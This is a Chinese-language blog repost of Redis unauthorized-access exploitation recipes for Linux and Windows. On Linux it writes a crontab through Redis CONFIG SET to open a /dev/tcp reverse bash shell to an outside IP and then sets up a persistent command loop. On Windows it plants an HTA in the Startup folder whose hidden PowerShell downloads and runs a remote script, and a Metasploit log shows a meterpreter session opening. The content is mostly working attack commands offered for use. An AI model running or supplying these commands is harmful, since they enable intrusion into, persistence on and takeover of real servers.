linux利用(转自wooyun)
redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 'ringzero',这样可以控制第一条记录,就能保证你的内容始终保持在最前面;
测试环境:CentOS,RHEL
# 利用crontab反弹shell
redis-cli flushall echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1 redis-cli config set dir /var/spool/cron/ redis-cli config set dbfilename root redis-cli save
# 利用crontab创建文件 /tmp/888
redis-cli flushall # 为了方便测试 redis-cli set test 'test' redis-cli set my 'mymymymymymymymymymymymy' redis-cli set word 'wordwordwordwordwordword' redis-cli set hello 'ringzero' redis-cli set word1 'word1word1word1word1word1word1' echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1 redis-cli config set dir /var/spool/cron/ redis-cli config set dbfilename root redis-cli save
redis-cli flushall echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1 redis-cli config set dir /var/spool/cron/ redis-cli config set dbfilename root redis-cli save
# 二次改写crontab
redis-cli flushall redis-cli set 2 ';a=`redis-cli get c`;' redis-cli set 1 'id;redis-cli set r `$a`;#' redis-cli config set dir /tmp/ redis-cli config set dbfilename w redis-cli save redis-cli set c whoami
# 利用第一步的写crontab步骤,完成下面的命令
echo " " > /tmp/zz cat /tmp/w >> /tmp/zz /bin/sh /tmp/zz redis-cli get r
控制 /var/spool/cron/root 和 /tmp/zz
# 最终实现,每10秒从redis的c变量读入要执行的命令,再将执行结果写入变量r
* * * * * sleep 10;/bin/sh /tmp/zz
windows利用方式(转自90sec)
redis 官方未发布windows版本,但是野外存在redis/win版本。
在测试时发现一windows版本redis,遂开始搞。
直接上利用,基于msf:
[email protected]:~# cat hta-psh.txt <scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt> :~# cat hta-psh.txt |redis-cli -x -h 192.168.138.27 set a OK
hta-psh.txt 对一些字符串进行变通,如不,在写入时会导致字符串丢失。
#msfconsole use payload/windows/meterpreter/reverse_tcp generate -t hta-psh -f /var/www/1.ps1 #之后起个handle,略
修改1.ps1,文件内容大概如下:
$command="powershell -nop -w hidden -e xxxxxxxxxxxxxxxx";iex $command;$command2="taskkill /im mshta.exe";iex $command2;
最后写入文件,等待管理员登陆
oot@xxx:~# redis-cli -h 192.168.138.27 redis 192.168.138.27:6379> CONFIG GET dir 1) "dir" 2) "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" redis 192.168.138.27:6379> config get dbfilename 1) "dbfilename" 2) "2.hta" redis 192.168.138.27:6379> save OK redis 192.168.138.27:6379>[/p]
msf exploit(handler) > rexploit -j -z [*] Stopping existing job... [*] Reloading module... [*] Exploit running as background job. [*] Started reverse TCP handler on x.x.x.x:80 msf exploit(handler) > [*] Starting the payload handler... [*] Sending stage (957999 bytes) to x.x.x.x [*] Meterpreter session 4 opened (x.x.x.x:80 -> x.x.x.x:56301) at 2016-06-06 11:06:00 -0400 [*] Session ID 4 (x.x.x.x:80 -> x.x.x.x:56301) processing AutoRunScript 'migrate -f' [*] Current server process: powershell.exe (4896) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3768 [+] Successfully migrated to process
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论